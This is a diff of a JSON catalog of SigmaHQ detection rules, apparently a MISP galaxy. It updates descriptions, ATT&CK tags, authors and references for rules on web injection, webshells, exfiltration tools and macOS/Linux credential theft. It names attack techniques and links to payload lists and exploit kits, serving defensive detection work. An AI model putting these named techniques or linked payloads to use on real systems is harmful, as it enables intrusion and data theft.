], + "type": "related-to" + } + ], + "uuid": "be4d9c86-d702-4030-b52e-c7859110e5e8", + "value": "Activity From Anonymous IP Address" + }, + { + "description": "Identifies user activities originating from geographically distant locations within a time period shorter than the time it takes to travel from the first location to the second.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "Conneting to a VPN, performing activity and then dropping and performing addtional activity." + ], + "filename": "azure_identity_protection_impossible_travel.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#impossible-travel", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_impossible_travel.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "b2572bf9-e20a-4594-b528-40bde666525a", + "value": "Impossible Travel" + }, + { + "description": "Indicates anomalous behavior based on suspicious sign-in activity across multiple tenants from different countries in the same browser", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_suspicious_browser.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#suspicious-browser", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_suspicious_browser.yml" + ], + "tags": [ + "attack.t1078", + "attack.persistence", + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.initial_access" + ] + }, + "related": [ + { + "dest-uuid": "b17a1a56-e99c-403c-8948-561df0cffe81", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "944f6adb-7a99-4c69-80c1-b712579e93e6", + "value": "Suspicious Browser Activity" + }, + { + "description": "Indicates that there are anomalous patterns of behavior like suspicious changes to the directory.", + "meta": { + "author": "Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'", + "creation_date": "2023/09/03", + "falsepositive": [ + "We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user." + ], + "filename": "azure_identity_protection_anomalous_user.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://learn.microsoft.com/en-us/azure/active-directory/architecture/security-operations-user-accounts#unusual-sign-ins", + "https://learn.microsoft.com/en-us/azure/active-directory/identity-protection/concept-identity-protection-risks#anomalous-user-activity", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/identity_protection/azure_identity_protection_anomalous_user.yml" + ], + "tags": [ + "attack.t1098", + "attack.persistence" + ] + }, + "related": [ + { + "dest-uuid": "a10641f4-87b4-45a3-a906-92a149cb2c27", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "258b6593-215d-4a26-a141-c8e31c1299a6", + "value": "Anomalous User Activity" + }, { "description": "Detects a core dump of a crashing Nginx worker process, which could be a signal of a serious problem or exploitation attempts.", "meta": { @@ -85693,8 +88161,29 @@ "https://github.com/hannob/apache-uaf/blob/da40f2be3684c8095ec6066fa68eb5c07a086233/README.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/product/apache/web_apache_threading_error.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.lateral_movement", + "attack.t1190", + "attack.t1210" + ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "e9a2b582-3f6a-48ac-b4a1-6849cdc50b3c", "value": "Apache Threading Error" }, @@ -85767,7 +88256,7 @@ "value": "Windows Webshell Strings" }, { - "description": "Detects exploitation attempt using the JDNIExploiit Kit", + "description": "Detects exploitation attempt using the JNDI-Exploit-Kit", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021/12/12", @@ -85779,19 +88268,31 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/pimps/JNDI-Exploit-Kit", "https://githubmemory.com/repo/FunctFan/JNDIExploit", + "https://github.com/pimps/JNDI-Exploit-Kit", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_jndi_exploit.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1190" + ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "412d55bc-7737-4d25-9542-5b396867ce55", "value": "JNDIExploit Pattern" }, { - "description": "Detects SQL Injection attempts via GET requests in access logs", + "description": "Detects potential SQL injection attempts via GET requests in access logs.", "meta": { - "author": "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems)", + "author": "Saw Win Naung, Nasreddine Bencherchali (Nextron Systems), Thurein Oo (Yoma Bank)", "creation_date": "2020/02/22", "falsepositive": [ "Java scripts and CSS Files", @@ -85803,16 +88304,29 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", - "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", "https://github.com/payloadbox/sql-injection-payload-list", "https://brightsec.com/blog/sql-injection-payloads/", + "https://www.acunetix.com/blog/articles/using-logs-to-investigate-a-web-application-attack/", + "https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/", + "https://book.hacktricks.xyz/pentesting-web/sql-injection/mysql-injection", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_sql_injection_in_access_logs.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1190" + ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "5513deaf-f49a-46c2-a6c8-3f111b5cb453", - "value": "SQL Injection Strings" + "value": "SQL Injection Strings In URI" }, { "description": "Detects source code enumeration that use GET requests by keyword searches in URL strings", @@ -85861,18 +88375,29 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", + "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/", "https://github.com/httpvoid/writeups/blob/62d3751945289d088ccfdf4d0ffbf61598a2cd7d/Confluence-RCE.md", "https://medium.com/geekculture/text4shell-exploit-walkthrough-ebc02a01f035", - "https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/", - "https://twitter.com/httpvoid0x2f/status/1532924261035384832", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_java_payload_in_access_logs.yml" ], "tags": [ "cve.2022.26134", - "cve.2021.26084" + "cve.2021.26084", + "attack.initial_access", + "attack.t1190" ] }, + "related": [ + { + "dest-uuid": "3f886f2a-874f-4333-b794-aa6075009b1c", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "583aa0a2-30b1-4d62-8bf3-ab73689efe6c", "value": "Java Payload Strings" }, @@ -85891,22 +88416,34 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/payloadbox/xss-payload-list", + "https://portswigger.net/web-security/cross-site-scripting/contexts", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_xss_in_access_logs.yml" ], - "tags": "No established tags" + "tags": [ + "attack.initial_access", + "attack.t1189" + ] }, + "related": [ + { + "dest-uuid": "d742a578-d70e-4d0e-96a6-02a9c30204e6", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "65354b83-a2ea-4ea6-8414-3ab38be0d409", "value": "Cross Site Scripting Strings" }, { "description": "Detects path traversal exploitation attempts", "meta": { - "author": "Subhash Popuri (@pbssubhash), Florian Roth (generalisation)", + "author": "Subhash Popuri (@pbssubhash), Florian Roth (Nextron Systems), Thurein Oo, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2021/09/25", "falsepositive": [ - "Happens all the time on systems exposed to the Internet", + "Expected to be continuously seen on systems exposed to the Internet", "Internal vulnerability scanners" ], "filename": "web_path_traversal_exploitation_attempt.yml", @@ -85914,6 +88451,7 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ + "https://book.hacktricks.xyz/pentesting-web/file-inclusion", "https://github.com/projectdiscovery/nuclei-templates", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_path_traversal_exploitation_attempt.yml" ], @@ -85947,8 +88485,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/lanmaster53/recon-ng/blob/9e907dfe09fce2997f0301d746796408e01a60b7/recon/core/base.py#L92", + "https://github.com/wpscanteam/wpscan/blob/196fbab5b1ce3870a43515153d4f07878a89d410/lib/wpscan/browser.rb", "https://github.com/xmendez/wfuzz/blob/1b695ee9a87d66a7d7bf6cae70d60a33fae51541/docs/user/basicusage.rst", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_susp_useragents.yml" ], @@ -85982,8 +88520,8 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/sensepost/reGeorg", "https://community.rsa.com/community/products/netwitness/blog/2019/02/19/web-shells-and-netwitness-part-3", + "https://github.com/sensepost/reGeorg", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_webshell_regeorg.yml" ], "tags": [ @@ -86017,8 +88555,8 @@ "logsource.product": "No established product", "refs": [ "https://github.com/projectdiscovery/nuclei-templates/blob/9d2889356eebba661c8407038e430759dfd4ec31/fuzzing/iis-shortname.yaml", - "https://www.exploit-db.com/exploits/19525", "https://github.com/lijiejie/IIS_shortname_Scanner", + "https://www.exploit-db.com/exploits/19525", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_iis_tilt_shortname_scan.yml" ], "tags": [ @@ -86086,12 +88624,24 @@ "logsource.category": "webserver", "logsource.product": "No established product", "refs": [ - "https://github.com/payloadbox/ssti-payloads", "https://book.hacktricks.xyz/pentesting-web/ssti-server-side-template-injection", + "https://github.com/payloadbox/ssti-payloads", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/webserver_generic/web_ssti_in_access_logs.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1221" + ] }, + "related": [ + { + "dest-uuid": "dc31fe1e-d722-49da-8f5f-92c7b5aff534", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "ada3bc4f-f0fd-42b9-ba91-e105e8af7342", "value": "Server Side Template Injection Strings" }, @@ -86535,8 +89085,8 @@ "logsource.product": "No established product", "refs": [ "https://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/", - "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-telerat-another-android-trojan-leveraging-telegrams-bot-api-to-target-iranian-users/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_telegram_api.yml" ], "tags": [ @@ -86627,14 +89177,14 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://perishablepress.com/blacklist/ua-2013.txt", - "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", - "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large", - "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", - "https://twitter.com/crep1x/status/1635034100213112833", - "http://www.botopedia.org/search?searchword=scan&searchphrase=all", "https://www.bluecoat.com/en-gb/security-blog/2015-05-05/know-your-agents", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://twitter.com/kladblokje_88/status/1614673320124743681?s=12&t=joEpeVa5d58aHYNGA_To7Q", + "https://pbs.twimg.com/media/FtYbfsDXoAQ1Y8M?format=jpg&name=large", + "http://www.botopedia.org/search?searchword=scan&searchphrase=all", + "https://networkraptor.blogspot.com/2015/01/user-agent-strings.html", + "https://twitter.com/crep1x/status/1635034100213112833", + "https://perishablepress.com/blacklist/ua-2013.txt", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_malware.yml" ], "tags": [ @@ -86667,9 +89217,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638", - "https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11", "https://blog.talosintelligence.com/ipfs-abuse/", + "https://github.com/Cisco-Talos/IOCs/tree/80caca039988252fbb3f27a2e89c2f2917f582e0/2022/11", + "https://isc.sans.edu/diary/IPFS%20phishing%20and%20the%20need%20for%20correctly%20set%20HTTP%20security%20headers/29638", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_susp_ipfs_cred_harvest.yml" ], "tags": [ @@ -86745,8 +89295,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://rclone.org/", "https://www.kroll.com/en/insights/publications/cyber/new-m365-business-email-compromise-attacks-with-rclone", + "https://rclone.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_rclone.yml" ], "tags": [ @@ -87098,9 +89648,9 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://www.spamhaus.org/statistics/tlds/", "https://www.symantec.com/connect/blogs/shady-tld-research-gdn-and-our-2016-wrap", "https://promos.mcafee.com/en-US/PDF/MTMW_Report.pdf", + "https://www.spamhaus.org/statistics/tlds/", "https://krebsonsecurity.com/2018/06/bad-men-at-work-please-dont-click/", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_download_susp_tlds_blacklist.yml" ], @@ -87360,8 +89910,8 @@ "logsource.category": "proxy", "logsource.product": "No established product", "refs": [ - "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "http://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules", + "https://github.com/fastly/waf_testbed/blob/8bfc406551f3045e418cbaad7596cff8da331dfc/templates/default/scanners-user-agents.data.erb", "https://github.com/SigmaHQ/sigma/tree/master/rules/web/proxy_generic/proxy_ua_hacktool.yml" ], "tags": [ @@ -87657,8 +90207,8 @@ "logsource.category": "file_event", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.014/T1546.014.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/file_event/file_event_macos_emond_launch_daemon.yml" ], "tags": [ @@ -87733,8 +90283,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://redcanary.com/blog/applescript/", "https://objective-see.org/blog/blog_0x4B.html", + "https://redcanary.com/blog/applescript/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_office_susp_child_processes.yml" ], "tags": [ @@ -87851,8 +90401,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://github.com/EmpireProject/Empire/blob/08cbd274bef78243d7a8ed6443b8364acd1fc48b/lib/modules/python/collection/osx/screenshot.py", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_screencapture.yml" ], "tags": [ @@ -88060,9 +90610,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/persistence_enable_root_account.toml", "https://ss64.com/osx/dsenableroot.html", + "https://github.com/redcanaryco/atomic-red-team/blob/b27a3cb25025161d49ac861cb216db68c46a3537/atomics/T1078.003/T1078.003.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dsenableroot_enable_root_account.yml" ], "tags": [ @@ -88145,8 +90695,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang", "https://github.com/elastic/detection-rules/blob/4312d8c9583be524578a14fe6295c3370b9a9307/rules/macos/execution_initial_access_suspicious_browser_childproc.toml", + "https://fr.slideshare.net/codeblue_jp/cb19-recent-apt-attack-on-crypto-exchange-employees-by-heungsoo-kang", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_browser_child_process.yml" ], "tags": [ @@ -88197,8 +90747,8 @@ "logsource.product": "macos", "refs": [ "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", - "https://github.com/MythicAgents/typhon/", "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", + "https://github.com/MythicAgents/typhon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_susp_child.yml" ], "tags": [ @@ -88221,8 +90771,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://wojciechregula.blog/post/macos-red-teaming-initial-access-via-applescript-url/", + "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-7f541fbc4a4a28a92970e8bf53effea5bd934604429112c920affb457f5b2685", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_execution_macos_script_editor.yml" ], "tags": [ @@ -88306,8 +90856,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://www.manpagez.com/man/8/PlistBuddy/", "https://redcanary.com/blog/clipping-silver-sparrows-wings/", + "https://www.manpagez.com/man/8/PlistBuddy/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_persistence_via_plistbuddy.yml" ], "tags": [ @@ -88389,9 +90939,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", "https://linux.die.net/man/1/truncate", "https://linux.die.net/man/1/dd", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1027.001/T1027.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_binary_padding.yml" ], "tags": [ @@ -88624,8 +91174,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-f5deb07688e1a8dec9530bc3071967b2da5c16b482e671812b864c37beb28f08", + "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_xcsset_malware_infection.yml" ], "tags": [ @@ -88682,8 +91232,8 @@ "logsource.product": "macos", "refs": [ "https://www.manpagez.com/man/8/firmwarepasswd/", - "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", "https://support.apple.com/guide/security/firmware-password-protection-sec28382c9ca/web", + "https://github.com/usnistgov/macos_security/blob/932a51f3e819dd3e02ebfcf3ef433cfffafbe28b/rules/os/os_firmware_password_require.yaml", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_susp_macos_firmware_activity.yml" ], "tags": [ @@ -89035,8 +91585,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos", "https://ss64.com/osx/dseditgroup.html", + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-5---add-a-newexisting-user-to-the-admin-group-using-dseditgroup-utility---macos", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_dseditgroup_add_to_admin_group.yml" ], "tags": [ @@ -89196,8 +91746,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://ss64.com/osx/sysadminctl.html", "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-3---create-local-account-with-admin-privileges-using-sysadminctl-utility---macos", + "https://ss64.com/osx/sysadminctl.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_sysadminctl_add_user_to_admin_group.yml" ], "tags": [ @@ -89264,9 +91814,9 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-c68a1fcbf7a3f80c87225d7fdc031f691e9f3b6a14a36754be00762bfe6eae97", "https://malpedia.caad.fkie.fraunhofer.de/details/osx.xcsset", + "https://www.microsoft.com/security/blog/2022/02/02/the-evolution-of-a-mac-trojan-updateagents-progression/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_wizardupdate_malware_infection.yml" ], "tags": [ @@ -89388,8 +91938,8 @@ "logsource.category": "process_creation", "logsource.product": "macos", "refs": [ - "https://gist.github.com/Capybara/6228955", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1555.001/T1555.001.md", + "https://gist.github.com/Capybara/6228955", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_creds_from_keychain.yml" ], "tags": [ @@ -89423,8 +91973,8 @@ "logsource.product": "macos", "refs": [ "https://docs.jamf.com/10.30.0/jamf-pro/administrator-guide/Components_Installed_on_Managed_Computers.html", - "https://github.com/MythicAgents/typhon/", "https://www.zoocoup.org/casper/jamf_cheatsheet.pdf", + "https://github.com/MythicAgents/typhon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/macos/process_creation/proc_creation_macos_jamf_usage.yml" ], "tags": [ @@ -89481,10 +92031,10 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", - "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://community.qualys.com/docs/DOC-6406-reporting-toolbox-focused-search-lists", + "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/default_credentials_usage.yml" ], "tags": "No established tags" @@ -89503,9 +92053,9 @@ "logsource.category": "No established category", "logsource.product": "qualys", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/host_without_firewall.yml" ], "tags": "No established tags" @@ -89526,9 +92076,9 @@ "logsource.category": "No established category", "logsource.product": "No established product", "refs": [ - "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://www.pcisecuritystandards.org/documents/PCI_DSS_v3-2-1.pdf", "https://www.cisecurity.org/controls/cis-controls-list/", + "https://nvlpubs.nist.gov/nistpubs/CSWP/NIST.CSWP.04162018.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/compliance/netflow_cleartext_protocols.yml" ], "tags": "No established tags" @@ -89733,8 +92283,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor", + "https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_bpfdoor_file_accessed.yml" ], "tags": [ @@ -89964,8 +92514,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://linux.die.net/man/1/xclip", + "https://www.cyberciti.biz/faq/xclip-linux-insert-files-command-output-intoclipboard/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_clipboard_collection.yml" ], "tags": [ @@ -90031,9 +92581,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://linux.die.net/man/8/insmod", "https://man7.org/linux/man-pages/man8/kmod.8.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.006/T1547.006.md", + "https://linux.die.net/man/8/insmod", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_load_module_insmod.yml" ], "tags": [ @@ -90102,8 +92652,8 @@ "logsource.product": "linux", "refs": [ "https://www.glitch-cat.com/p/green-lambert-and-attack", - "https://objective-see.org/blog/blog_0x68.html", "https://www.anomali.com/blog/pulling-linux-rabbit-rabbot-malware-out-of-a-hat", + "https://objective-see.org/blog/blog_0x68.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_unix_shell_configuration_modification.yml" ], "tags": [ @@ -90136,9 +92686,9 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://imagemagick.org/", - "https://linux.die.net/man/1/import", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1113/T1113.md", + "https://linux.die.net/man/1/import", + "https://imagemagick.org/", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_screencapture_import.yml" ], "tags": [ @@ -90171,8 +92721,8 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.004/T1562.004.md", + "https://firewalld.org/documentation/man-pages/firewall-cmd.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/linux/auditd/lnx_auditd_disable_system_firewall.yml" ], "tags": [ @@ -90238,10 +92788,10 @@ "logsource.category": "No established category", "logsource.product": "linux", "refs": [ - "https://mn3m.info/posts/suid-vs-capabilities/", - "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", - "https://www.hackingarticles.in/linux-privilege-escalation-using-capabilities/", "https://man7.org/linux/man-pages/man8/getcap.8.html", + "https://int0x33.medium.com/day-44-linux-capabilities-privilege-escalation-via-openssl-with-selinux-enabled-and-enforced-74d2bec02099", + 